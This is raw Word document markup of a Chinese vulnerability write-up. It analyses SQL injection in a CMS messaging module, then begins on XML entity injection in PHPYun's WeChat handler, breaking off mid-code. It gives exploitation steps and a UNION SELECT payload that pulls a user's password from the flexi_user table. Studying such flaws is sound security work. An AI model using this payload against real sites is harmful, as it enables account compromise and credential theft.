                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-61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where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`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name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`='$to[name]'");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48" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="540" w:right="723" w:hanging="54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又</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-49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SELECT</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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一遍，不过</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-47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name</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/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还是注射时的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-47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name</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>，这一句也被注射了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global</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda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$gUser;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="7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'to'] = $to['name'];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'to_id'] = $to['id'];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'from'] = $gUser-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>name;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'from_id'] = $gUser-&gt;id;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'create_time'] = TIME_STAMP;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'type'] = $type;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insert(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$message);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47" w:line="288" w:lineRule="auto"/>
                    <w:ind w:right="-3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看到下一句，终于长舒一口气，注射可以有回显了！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to_id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-68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就是我们的语句执行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结果，而它会报错给我们看的！</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73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$this-&gt;_db-&gt;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execute(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"update #  user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-52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set</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="540" w:right="915" w:hanging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`new_msg_count`=`new_msg_count`+1 where `id`=$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to_id]"); if($newCall&gt;0){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="253" w:lineRule="exact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'to'] = '';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message[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'to_id'] = 0;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insert(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$message);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$newCall--;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续分析代码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> File:/isite/components/messages/models/message.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="477" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia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10038" type="#_x0000_t202" style="width:319.25pt;height:130.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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="540" w:right="3681" w:hanging="1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if(is_array($to)){ foreach ($to as $sto){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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sendMessage(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$sto,$message,null,$newCall);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="5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3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line="301" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18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注册一下，在会员中心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>站内短信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发信息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里那个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> link </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模块里的注射没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找到表单在什么地方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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0037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.35pt;width:337.5pt;height:50.85pt;z-index:232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test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  <w:spacing w:val="-62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65"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1=2</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-62"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>union</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-62"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>select</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-65"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>password</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-62"/>
                    </w:rPr>
                    <w:t xml:space="preserve"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-62"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>flexi_user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-62"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>where id=1#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注射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho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8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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2"/>
        <w:spacing w:before="167"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="PHPYun_XML实体注入"/>
      <w:bookmarkStart w:id="28" w:name="_bookmark13"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:t xml:space="preserve">PHPYun XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>作者：未知</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:right="3263"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">/weixin/model/index.clss.php </w:t>
      </w:r>
      <w:r>
        <w:t>Code: 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10036" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:17.45pt;width:319.25pt;height:242.2pt;z-index:236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58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class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 index_controller extends common</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1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5"/>
                    <w:ind w:left="915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public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 $MsgType;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="113"/>
                    <w:ind w:left="915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public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 function index_action()</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/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5"/>
                    <w:ind w:left="1831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$_GET["echostr"])</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="1831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5"/>
                    <w:ind w:left="1690" w:right="1095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valid(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115"/>
                    <w:ind w:left="1831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}else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3"/>
                    <w:ind w:left="2748" w:right="-2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//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!$this-&gt;checkSignature()){echo</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:spacing w:val="-4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"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="75"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>非法来源地址！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>;exit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();};</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111"/>
                    <w:ind w:left="1690" w:right="1589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$postStr =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1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GLOBALS[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"HTTP_RAW_POST_DATA"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="2748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if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 xml:space="preserve"> (!empty($postStr))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:right="786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35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58" w:line="372" w:lineRule="auto"/>
                    <w:ind w:right="1317" w:firstLine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$postObj = simplexml_load_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string(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$postStr, 'SimpleXMLElement', LIBXML_NOCDATA);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="208" w:lineRule="exact"/>
                    <w:ind w:left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$fromUsername =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:jc w:val="both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$postObj-&gt;FromUserName;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="2928" w:right="-1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$toUsername =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas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$postObj-&gt;ToUserName;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="2928" w:right="-1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$keyword =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:spacing w:val="-26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trim(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$postObj-&gt;Content);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left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 xml:space="preserve">$times = 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time(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115"/>
                    <w:ind w:left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$MsgType = $postObj-&gt;MsgType;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="113"/>
                    <w:ind w:left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$topTpl = "&lt;xml&gt;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jc w:val="both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&lt;ToUserName&gt;&lt;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![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CDATA[%s]]&gt;&lt;/ToUserName&gt;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jc w:val="both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&lt;FromUserName&gt;&lt;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![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CDATA[%s]]&gt;&lt;/FromUs</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>erName&gt;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jc w:val="both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&lt;CreateTime&gt;%s&lt;/CreateTime&gt;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jc w:val="both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&lt;MsgType&gt;&lt;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![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CDATA[%s]]&gt;&lt;/MsgType&gt;";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spacing w:line="372" w:lineRule="auto"/>
                    <w:ind w:right="2249" w:firstLine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$bottomStr = "&lt;FuncFlag&gt;0&lt;/FuncFlag&gt;&lt;/xml&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="208" w:lineRule="exact"/>
                    <w:ind w:left="2928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$MsgType=='event')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:right="426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5" w:line="372" w:lineRule="auto"/>
                    <w:ind w:left="3663" w:right="-7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$MsgEvent =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:spacing w:val="-63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$postObj-&gt;Event; if ($MsgEvent=='subscribe')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="211" w:lineRule="exact"/>
                    <w:ind w:left="1039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5"/>
                    <w:ind w:right="617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</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:jc w:val="both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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>"&lt;Content&gt;&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>![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CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>欢迎您关注</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71" w:line="307" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>".</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>iconv(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'gbk</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>','utf-8',$this-&gt;config['sy_webname'])."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-74"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>1</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>：您可以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pacing w:val="-3"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>直接回复关键字如【销售】、【南京</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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pacing w:val="-4"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>销售】、【南京</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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销售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Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>XX</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-46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公司】查找您想要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的职位</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-59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绑定您的账户体验更多精彩功能</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>\n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-59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感谢您的关注！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>]]&gt;&lt;/Content&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="52"/>
                    <w:ind w:right="221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$this-&gt;MsgType =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:jc w:val="both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'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text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';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="113"/>
                    <w:ind w:left="3663" w:right="-4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/>
                      <w:spacing w:val="-65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($MsgEvent=='CLICK')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34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58"/>
                    <w:ind w:left="1039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115"/>
                    <w:ind w:right="715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$EventKey =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1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$postObj-&gt;EventKey;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$EventKey=='myaccount'){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 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bindUser(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before="1"/>
                    <w:ind w:left="915"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>我的消息</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111"/>
                    <w:ind w:right="1704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 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myMsg(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before="1"/>
                    <w:ind w:left="915"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>面试邀请</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="113"/>
                    <w:ind w:right="1704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 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Audition(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11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 w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>简历查看</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111"/>
                    <w:ind w:right="1704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 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lookResume(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11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 w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>刷新简历</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
